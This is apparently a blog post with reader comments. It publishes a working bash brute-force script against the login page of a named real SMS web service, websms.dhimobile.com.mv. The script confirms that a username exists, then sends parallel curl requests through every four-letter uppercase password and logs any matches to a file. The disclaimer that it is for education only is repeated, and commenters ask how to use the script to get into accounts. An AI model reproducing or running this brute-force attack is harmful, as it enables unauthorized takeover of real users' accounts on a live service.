some time ago I posted an article about how ridiculously insecure the webSMS site was, and how it was relatively simple it was for somebody to write up a bash script to possibly crack the default passwords.
For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)
EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!
For lack of something better to post about, I'm releasing the 5-minute bash script that I wrote as a proof-of-concept (for myself mostly). The following code is released on a ZERO LIABILITY basis. Which means, I am in no way responsible for your actions. It's proof-of-concept code and is NOT intended to be used. Educational purposes only. I will not be held responsible for any claims or charges of damages, negligence, cyber-crime etc and YOU automatically agree to this if you continue reading beyond this point. As such, I will not be giving you instructions or assistance regarding it. Thank you for your co-operation :)
EDIT: It seems some people didn't get the message when I said I won't provide any support for this. Let me clarify, DO NOT ASK ME HOW TO USE IT!
#!/bin/bash
cd $HOME/Desktop
mxjobs=15
cont=0
if [ -z ${2} ]
then
cont=1
else
cont=0
fi
echo "checking if username exists"
if [ -n "`curl -s --compressed -d \"username=${1}&password=wroXngo123!@)\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | \
grep \"password is incorrect\"`" ]
then
echo "User exists. Let's see what happens."
else
echo "That username does not exist."
exit
fi
for a in {A..Z};do for b in {A..Z};do for c in {A..Z};do for d in {A..Z}
do
f="${a}${b}${c}${d}"
if [ $cont -lt 1 ]
then
echo -en "skipping ${a}${b}${c}${d}\r"
if [ "${f}" = "${2}" ]
then
echo
echo "MATCH"
cont=1
fi
continue
fi
ok=0
while [ $ok -lt 1 ]
do
if [ `ps -A | grep curl | wc -l` -lt $mxjobs ]
then
ok=1
fi
done
echo -en "Testing ${f}\r"
if [ -n "`curl -s --compressed -d \"username=${1}&password=${f}\" \
http://websms.dhimobile.com.mv/cgi-bin/websms/index.pl | grep Dear`" ];then \
echo "Found ${1},${f}" | tee -a foundpasses.txt;killall curl;kill ${$};fi&
done;done;done;done
echo "I guess we didn't find it then"
WOT?
ReplyDeletewhich languaje is this 1, java script?
ReplyDeletehow to get the web sms password........
ReplyDeletei have gorfot the user name!.....
ReplyDelete